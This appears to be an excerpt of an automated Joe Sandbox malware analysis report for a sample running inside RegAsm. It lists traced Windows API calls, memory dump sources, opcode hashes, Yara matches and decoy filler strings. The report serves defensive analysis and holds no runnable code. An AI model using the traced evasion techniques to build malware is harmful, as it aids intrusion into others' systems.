                                                                                                                                                                                                • String ID: GetEnabledXStateFeatures
                                                                                                                                                                                                • API String ID: 0-1068256093
                                                                                                                                                                                                • Opcode ID: dbf727c37c10751f32ab045c9ddfac58d62437f83106434467ceb93fa75cca0a
                                                                                                                                                                                                • Instruction ID: bbcbc5e54cd788ba8e05fe92fe568d2d3522ceb002f1374eb2ab10f43a95b14e
                                                                                                                                                                                                • Opcode Fuzzy Hash: dbf727c37c10751f32ab045c9ddfac58d62437f83106434467ceb93fa75cca0a
                                                                                                                                                                                                • Instruction Fuzzy Hash: E8F0C2B950112877CF163F60DD48BDE3E16AFA8B21F014525FD4826294DA72992196E4
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040FB4C
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • GetSystemTime.KERNEL32(?,004253D8,00000000,00000001,00000000,00425502,004254FF), ref: 0040FB8C
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prologSystemTimelstrcpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 818586813-0
                                                                                                                                                                                                • Opcode ID: fad617f0d976be7dad0ee63a09eada3ef602cfcdba4d093542321a0bef98dcae
                                                                                                                                                                                                • Instruction ID: 4df3709997d0cc12e09e6dacff74294a906b8749b286f4ad1b2c6ae5e2a4139a
                                                                                                                                                                                                • Opcode Fuzzy Hash: fad617f0d976be7dad0ee63a09eada3ef602cfcdba4d093542321a0bef98dcae
                                                                                                                                                                                                • Instruction Fuzzy Hash: D911E671A00214EBCB05EFAAC851AAEFBB5EF95714F40847FE406B7291C7785A05CB54
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(1B682EA6,00000001,00000000,?,?,?,1B68362E,00000000), ref: 1B682DAA
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: EnumLocalesSystem
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2099609381-0
                                                                                                                                                                                                • Opcode ID: 9932a3f707ea16d9654554b8be40d529ce37319d761065789030ec01b0099fce
                                                                                                                                                                                                • Instruction ID: 1e4f94e29ef0e476c417299fbcf88f9df3440f85d9e4c0fecb1c28a605598c0e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9932a3f707ea16d9654554b8be40d529ce37319d761065789030ec01b0099fce
                                                                                                                                                                                                • Instruction Fuzzy Hash: C411487B6007029FDB089F38C891AEABBA2FF80358B14442CEA8787B40D771B407CB40
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(1B68318D,00000001,?,?,?,?,1B6835F6,?), ref: 1B682E43
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: EnumLocalesSystem
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2099609381-0
                                                                                                                                                                                                • Opcode ID: 8031e8c557a0076543394b13cbe8f5caaa275f2c6ed810838f84f36cbed1edec
                                                                                                                                                                                                • Instruction ID: d4bc401b76e0721177f3d9bf248b5159379031839f0c11ada0fc6a01022a99f8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8031e8c557a0076543394b13cbe8f5caaa275f2c6ed810838f84f36cbed1edec
                                                                                                                                                                                                • Instruction Fuzzy Hash: 54F08B762003041FDB144F34CCC4BEA7B91FF80768F05842CFA454B680C7B1A802CB54
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(1B66FF01,00000001,1B6CD298,0000000C,1B670A92,?), ref: 1B66FF4F
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: EnumLocalesSystem
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2099609381-0
                                                                                                                                                                                                • Opcode ID: 1c64810483d1bd431cfab53d3d9da3689623006dffd760b73574958cbad4a630
                                                                                                                                                                                                • Instruction ID: d029a68ff29d91b8f75e289ee74ea363d25e14041d89df44689be5fbed8dd789
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c64810483d1bd431cfab53d3d9da3689623006dffd760b73574958cbad4a630
                                                                                                                                                                                                • Instruction Fuzzy Hash: D4F04F76A00214EFDB04DF98D481BDD7BB0FB69325F00416EE814D7290C7759904CF50
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(1B682BE6,00000001,?,?,?,1B683650,?), ref: 1B682CED
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: EnumLocalesSystem
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2099609381-0
                                                                                                                                                                                                • Opcode ID: 7817db0f3d235b0fd37b91b4501209637453c4e258a1d4eac789f548f28f9b44
                                                                                                                                                                                                • Instruction ID: 0c0b7caf0b5862af5cd1d6d1111874e04a73f03d139c51f8c8a91187d2e2482d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7817db0f3d235b0fd37b91b4501209637453c4e258a1d4eac789f548f28f9b44
                                                                                                                                                                                                • Instruction Fuzzy Hash: F2F0E53A70034A5BCB049F39DC45BAA7F94FFC2754B06409CEE058B250C671A946CBA0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_0001D426), ref: 0041D46D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                                • Opcode ID: de0aac2f3061b1883abbbc2dc59b1f2f59bebef8228863a6d3d464d6577e8f83
                                                                                                                                                                                                • Instruction ID: 9aa36228bd1312c3dafb40d94854ee8584c16ee015a5e92c1a44cea04fe1b8fb
                                                                                                                                                                                                • Opcode Fuzzy Hash: de0aac2f3061b1883abbbc2dc59b1f2f59bebef8228863a6d3d464d6577e8f83
                                                                                                                                                                                                • Instruction Fuzzy Hash: E39002B4F511448A86101B706D0954566D05B9861279244626101C4464DA745181D529
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00004214), ref: 1B634A98
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                                • Opcode ID: f985dfb10ed505531c1fb74d6215c0ec2154f4fdced6bc74d9cee4344334cf1d
                                                                                                                                                                                                • Instruction ID: 319339f03e70d4f775b50e7953a24c5d2f059e0a04a17ea1f1d093fb0dbe5278
                                                                                                                                                                                                • Opcode Fuzzy Hash: f985dfb10ed505531c1fb74d6215c0ec2154f4fdced6bc74d9cee4344334cf1d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F9002F454412A5ACE249692EE498D8A92465BEA473004064E54D5441C851641458637
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040D384
                                                                                                                                                                                                  • Part of subcall function 0040D284: _EH_prolog.MSVCRT ref: 0040D289
                                                                                                                                                                                                  • Part of subcall function 0040D284: lstrlenA.KERNEL32(?,6CBD7FA0,75AA5460,00000000), ref: 0040D2AD
                                                                                                                                                                                                  • Part of subcall function 0040D284: strchr.MSVCRT ref: 0040D2BF
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,6CBD7FA0,00000000), ref: 0040D3D3
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,6CBD7FA0,00000000), ref: 0040D3DA
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,6CBD7FA0,00000000), ref: 0040D3EF
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,6CBD7FA0,00000000), ref: 0040D3F6
                                                                                                                                                                                                • strcpy_s.MSVCRT ref: 0040D42F
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D446
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D44D
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D473
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D47A
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D481
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D488
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D49D
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D4A4
                                                                                                                                                                                                • strcpy_s.MSVCRT ref: 0040D4B7
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D4C8
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D4CF
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0), ref: 0040D4EA
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D4F1
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0), ref: 0040D4F8
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D4FF
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0), ref: 0040D514
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D51B
                                                                                                                                                                                                • strcpy_s.MSVCRT ref: 0040D52E
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0040D53F
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460), ref: 0040D546
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D568
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D56F
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D576
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D57D
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D595
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D59C
                                                                                                                                                                                                • strcpy_s.MSVCRT ref: 0040D5AF
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D5C0
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D5C7
                                                                                                                                                                                                  • Part of subcall function 0040D1D6: strlen.MSVCRT ref: 0040D1ED
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D5D0
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D5E0
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D5E7
                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D613
                                                                                                                                                                                                • strcpy_s.MSVCRT ref: 0040D637
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,00000001,00000000,?,?,00000000), ref: 0040D660
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D667
                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D66C
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000001,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D677
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D67E
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D68F
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CBD7FA0,00000000), ref: 0040D696
                                                                                                                                                                                                • strcpy_s.MSVCRT ref: 0040D6A4
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0040D6B0
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460), ref: 0040D6B7
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0040D6DD
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 0040D6E4
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000010), ref: 0040D6EB
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0040D6F2
                                                                                                                                                                                                • strcpy_s.MSVCRT ref: 0040D70A
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0040D71B
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 0040D722
                                                                                                                                                                                                • strlen.MSVCRT ref: 0040D770
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0040D7B4
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460), ref: 0040D7BB
                                                                                                                                                                                                  • Part of subcall function 0040D284: strchr.MSVCRT ref: 0040D2E3
                                                                                                                                                                                                  • Part of subcall function 0040D284: lstrlenA.KERNEL32(?), ref: 0040D301
                                                                                                                                                                                                  • Part of subcall function 0040D284: GetProcessHeap.KERNEL32(00000008,-00000001), ref: 0040D30E
                                                                                                                                                                                                  • Part of subcall function 0040D284: HeapAlloc.KERNEL32(00000000), ref: 0040D315
                                                                                                                                                                                                  • Part of subcall function 0040D284: strcpy_s.MSVCRT ref: 0040D350
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0040D807
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 0040D80E
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$H_prologstrchrstrlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2599614518-0
                                                                                                                                                                                                • Opcode ID: cf0ecef83dbbc2a2af86740d8966e5d5e0cd88ed1842b8b923e0d93c82f5e9c9
                                                                                                                                                                                                • Instruction ID: 4e96a980e3ef2b1513e6b26e3c3319686b662b6b78d9b075673ba62ee632f77c
                                                                                                                                                                                                • Opcode Fuzzy Hash: cf0ecef83dbbc2a2af86740d8966e5d5e0cd88ed1842b8b923e0d93c82f5e9c9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 89E11975C0021AAFDF11AFE0DD89AAFBB79FF08304F10182AF605B2191DB795A04DB65
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re, xrefs: 0041637B
                                                                                                                                                                                                • The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser, xrefs: 0041631C
                                                                                                                                                                                                • GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re, xrefs: 00416303
                                                                                                                                                                                                • kernel32.dll, xrefs: 0041630F
                                                                                                                                                                                                • GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re, xrefs: 0041632B
                                                                                                                                                                                                • hhB, xrefs: 0041636C
                                                                                                                                                                                                • The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser, xrefs: 004162F9
                                                                                                                                                                                                • The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser, xrefs: 00416345
                                                                                                                                                                                                • GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re, xrefs: 0041634F
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressProc$wcslen$LibraryLoad
                                                                                                                                                                                                • String ID: GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re$GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re$GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re$GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re$The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser$The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser$The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser$hhB$kernel32.dll
                                                                                                                                                                                                • API String ID: 3854642915-181006640
                                                                                                                                                                                                • Opcode ID: 49624ccbf360a564c1010e240798a798749cb03028986dfc02c2b02ef391c22b
                                                                                                                                                                                                • Instruction ID: 1cd199677c0e39bd8442f48b4b18fd990d60752aa228bc5dae81643b434566b1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 49624ccbf360a564c1010e240798a798749cb03028986dfc02c2b02ef391c22b
                                                                                                                                                                                                • Instruction Fuzzy Hash: C2815D7E910620EFEB526FA0FD09A253FB3F70AB01B14613AFA0586231DB764461EF14
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040AC74
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040FD0C: SHGetFolderPathA.SHELL32(00000000,{LB,00000000,00000000,?), ref: 0040FD3D
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
